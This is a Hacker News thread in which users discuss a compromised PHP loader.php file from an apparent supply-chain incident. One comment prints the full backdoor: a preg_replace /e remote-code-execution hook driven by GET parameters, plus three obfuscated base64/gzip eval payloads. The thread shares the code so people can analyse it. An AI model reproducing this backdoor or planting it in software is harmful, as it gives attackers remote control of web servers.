Hacker News new | ask | show | jobs
by sxsde 4945 days ago
Has anyone the compromised Loader.php?
1 comments
infinity 4945 days ago
The article says that the malicious code has been appended to the loader.php file. The malicious code cited in the article is abridged, here is a complete version:

  <?php Error_Reporting(0);     if(isset($_GET['g']) && isset($_GET['s'])) { 
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit; 
  } 
  if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWEpFGwk4nZr4zkRGQsJn3kMND6jcBgayIKnkIX3n2tu1EieGARMoH3W8NXjBp4JAVQq8GFR/KcAbcyoSfhX9vzeU0R8K3mH313Q4UnAykzj9707HzHZ67PJndpyPSqKHbZ0kLq6N0s5KdDxSKYz7wkwE80mW6e3m3gbz8l0i2jh50b2sRJEnwjxJ1tOjVvumO9RrPHsT9BZNSN0qm2F2TlLDO9EqSNMADWCHW/LmLsvmbn009XNOA38yH6qNUm+a97jyA55xzFpgViGxa2SlN2ObBZQeuxwwL9kocnrzBWVXDMo='))); ?><? eval(gzuncompress(base64_decode('eF5dj1tvgkAQhf+KDyRq0gdYUCGGB7RCaYGmwC6BpjHLpStXjbgoNv3vBUybxofJzJmc+U7mk1bRKd1Xoy0niAuBBzPATZh0+sVgWTkecTsZu540x96l9h2RMzKFvKjxISztJubNha7Crv40cYs3YjnC5bVdFWHKIXitSVT5c9MRBCPbUCvNiQ1QhoHYmJlytq4Kb2aQ2GXRBl7QJGux7TKouRbA+GHsqDaEqqS7nAU7CXNkI4hcpEoI5rncrZ6JPDRX7/34yWajx31j8Ks25C02BAWIAKQ+kE4GT2ik7c6dzQCXg9/O6hBE/XFUojLIWPkXoAzI0EMs1qS8z91ILrptOxKNNUTjm/znxxraBRpqB6B+x71L9J16MGgFj71hXPd/TJfH5ESP1SjEdTIXtnES7eNkwuB3Jv2YLr9/AJyvggM='))); ?><? eval(gzuncompress(base64_decode('eF59VH9r2zAQ/SouBGoxE3SSf2I0lnVOCXhxsZ3tj2BE2JIRKMnwEtgo/e47ycliuZMDcpDu3rvT6d5lbXtsZbn9eWxP+8MPtz2eD99dSkg6kVRcdu8CtQUhwY8jn7OAAbrgERMTWWXll6xc921AGmf6XwsjTQd7zIuPs7xa30sOCUsSRkN536xp4/bdOfH6W594CFaBuZELprffuTZOaKwmhuHkfJFnUhJn2qcMCSHb3/tTujsfvp32x4PzLCV1J9LHFABXgCskLxMZWS/DGxdztRh9zEpG3sOqzIunWuIfEvp2/2Dgj8WdPWbLWqVjR4Umql58zoqVwgR2TGRi5kWeF1/z4mFWL4qld20JOmXB4EPsnLHJWWb1qlzW5WxZzbOyzzlcI5yJyflUVHWPifd+49uREEDfxpgvsvxTZfRlRFS7h6oxY2s3AGiukWDs4tBuT+f24CBZ+tpvP0Bzot6bqg8IPGKqA4GJTdtu/hjSiYl477w9TtSxoVVqagxAeaggpFMVRnLuhHBu0Uyto6TNA04aoVDpK365vR5cXRe0nMEXH6x+WimJmSROgt3m+ddWFYLrPO8UC3m51E4bMQEbp1YT+N5twOk0gpE0wg5yLUrgCCyKjjOM+u/9INA1CMXl8bh5iUC3Dbsyhs6N8IqiGtVNHNoNP8VonzmA6rVPwtg67wAHnpldNKYLrT2ITEQ85ExGKBjtKEj6F8qIppY='))); ?>
link
halfdan 4941 days ago
Do you have a version of the core/DataTable/Filter/Megre.php file as well?
link
infinity 4940 days ago
I'm sorry, I don't have this file, but I would like to look at it as well. If you find it somewhere on the web, could you post a link here?
link